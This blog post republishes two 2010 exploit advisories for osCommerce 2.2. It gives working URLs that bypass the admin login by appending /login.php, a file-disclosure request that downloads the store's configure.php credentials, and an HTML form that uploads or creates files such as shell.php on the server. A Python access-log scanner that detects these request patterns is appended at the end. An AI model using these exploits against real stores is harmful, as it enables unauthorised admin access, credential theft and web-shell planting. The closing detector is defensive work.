Two exploits have been discovered within hours of the latest release of osCommerce, probably the best-known CMS dedicated to the e-commerce world and completely open source!

Both exploits affect the latest release, 2.2, and would allow access to the board's files, with write capability, and viewing the Admin panel without credentials.

After the jump, as usual, you will find the exploits…

Oscommerce Online Merchant v2.2 File Disclosure And Admin ByPass

Author : Flyff666
Date : May, 30, 2010
Location : Tangerang, Indonesia
Time Zone : GMT +7:00
Software : OsCommerce Online Merchant v2.2
Tested on : All OS
--------------------------------------------
Email : [email protected]
gReets : Mywisdom(abang.. wkkwkwk), Kiddies, Chaer, Petimati, c4uR
WhiteHat, Cruz3n, Gunslinger, v3n0m, z0mb13, Bumble_be
Spykit, BobyHikaru, Fribo. all member.
Site : Http://www.Devilzc0de.org/forum/
Forum : Http://Indonesianhacker.or.id/
--------------------------------------------

# ByPass Page Admin :

You can use this trick if the admin folder is not protected by .htaccess

If you want to explore the admin page without logging in, you can use /login.php after the name of the file

Example :

http://[site]/admin/backup.php/login.php

or

http://[site]/admin/file_manager.php/login.php

Demo :

http://server/store/admin/file_manager.php/login.php

You can see all files in the osCommerce directory.. haha

and you can download all files with the trick above

# File Disclosure :

in : admin/file_manager.php/login.php?action=download&filename=

Exploit : admin/file_manager.php/login.php?action=download&filename=/includes/configure.php

Example : http://[site]/[path]/admin/file_manager.php/login.php?action=download&filename=/includes/configure.php

Oscommerce Online Merchant v2.2 – Remote File Upload

______                _       _   _
 | ___ \              | |     | | (_)
 | |_/ /_____   _____ | |_   _| |_ _  ___  _ __
 |    // _ \ \ / / _ \| | | | | __| |/ _ \| '_ \
 | |\ \  __/\ V / (_) | | |_| | |_| | (_) | | | |
 \_| \_\___| \_/ \___/|_|\__,_|\__|_|\___/|_| |_|

 _____                      _____  _____
 |_   _|                    |  _  ||  _  |
 | | ___  __ _ _ __ ___   | |/' || |_| |
 | |/ _ \/ _` | '_ ` _ \  |  /| |\____ |
 | |  __/ (_| | | | | | | \ |_/ /.___/ /
 \_/\___|\__,_|_| |_| |_|  \___/ \____/

 DEFACEMENT it's for script kiddies...
_____________________________________________________________

[$] Exploit Title     : Oscommerce Online Merchant v2.2 - Remote File Upload
[$] Date              : 30-05-2010
[$] Author            : MasterGipy
[$] Email             : mastergipy [at] gmail.com
[$] Bug               : Remote File Upload
[$] Vendor            : http://www.oscommerce.com
[$] Google Dork       : n/a

[%] vulnerable file: /admin/file_manager.php

[REMOTE FILE UPLOAD VULNERABILITY]

[$] Exploit:

<html><head><title>Oscommerce Online Merchant v2.2 - Remote File Upload </title></head>
<br><br><u>UPLOAD FILE:</u><br>
<form name="file" action="http://<--  CHANGE HERE   -->/admin/file_manager.php/login.php?action=processuploads" method="post" enctype="multipart/form-data">
<input type="file" name="file_1"><br>
<input name="submit" type="submit" value="   Upload   " >
</form>

<br><u>CREATE FILE:</u><br>
<form name="new_file" action="http://<--  CHANGE HERE   -->/admin/file_manager.php/login.php?action=save" method="post">
FILE NAME:<br>
<input type="text" name="filename">&nbsp; (ex. shell.php)<br>FILE CONTENTS:<br>
<textarea name="file_contents" wrap="soft" cols="70" rows="10"></textarea>
<input name="submit" type="submit" value="   Save   " >
</form>
</html>

[=] Thanks to  Flyff666 for the original exploit:
 - Oscommerce Online Merchant v2.2 File Disclosure / Admin ByPass

[§] Greetings from PORTUGAL ^^
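As an added example that is not part of either advisory above: a small Python scanner that flags, in Apache-style access logs, the request shape both advisories rely on (an admin script with a spurious /login.php appended as extra path info) together with the file_manager actions they use. The log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Apache combined-style prefix); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [30/May/2010:10:01:02 +0700] "GET /store/admin/login.php HTTP/1.1" 200 1234
10.0.0.5 - - [30/May/2010:10:01:09 +0700] "GET /store/admin/file_manager.php/login.php HTTP/1.1" 200 8820
10.0.0.5 - - [30/May/2010:10:01:15 +0700] "GET /store/admin/file_manager.php/login.php?action=download&filename=/includes/configure.php HTTP/1.1" 200 2210
10.0.0.5 - - [30/May/2010:10:01:30 +0700] "POST /store/admin/file_manager.php/login.php?action=processuploads HTTP/1.1" 302 0
10.0.0.9 - - [30/May/2010:10:02:00 +0700] "GET /store/admin/file_manager.php?action=download&filename=readme.txt HTTP/1.1" 302 0
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# An admin script followed by an extra "/login.php" path segment: the bypass shape from the advisory.
BYPASS_RE = re.compile(r'/admin/[^/?]+\.php/login\.php(?:$|[/?])')
# file_manager.php actions the two advisories use for disclosure, upload and file creation.
RISKY_ACTIONS = {"download", "processuploads", "save"}


def classify(line):
    """Return finding tags for one access-log line (empty list when benign or unparsable)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    findings = []
    parts = urlsplit(m.group("target"))
    if BYPASS_RE.search(parts.path):
        findings.append("admin_pathinfo_bypass")
        action = parse_qs(parts.query).get("action", [""])[0]
        if action in RISKY_ACTIONS:
            findings.append("file_manager_" + action)
        # A 200 means the admin script was actually served; a 3xx (redirect back to the
        # login page) suggests the login check held, e.g. because of .htaccess protection.
        if m.group("status") == "200":
            findings.append("served_200")
    return findings


def scan(log_text):
    """Return (ip, request target, findings) for every line that raised a finding."""
    hits = []
    for line in log_text.splitlines():
        findings = classify(line)
        if findings:
            m = LOG_RE.match(line)
            hits.append((m.group("ip"), m.group("target"), findings))
    return hits


if __name__ == "__main__":
    for ip, target, findings in scan(SAMPLE_LOG):
        print(ip, target, ", ".join(findings))
```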
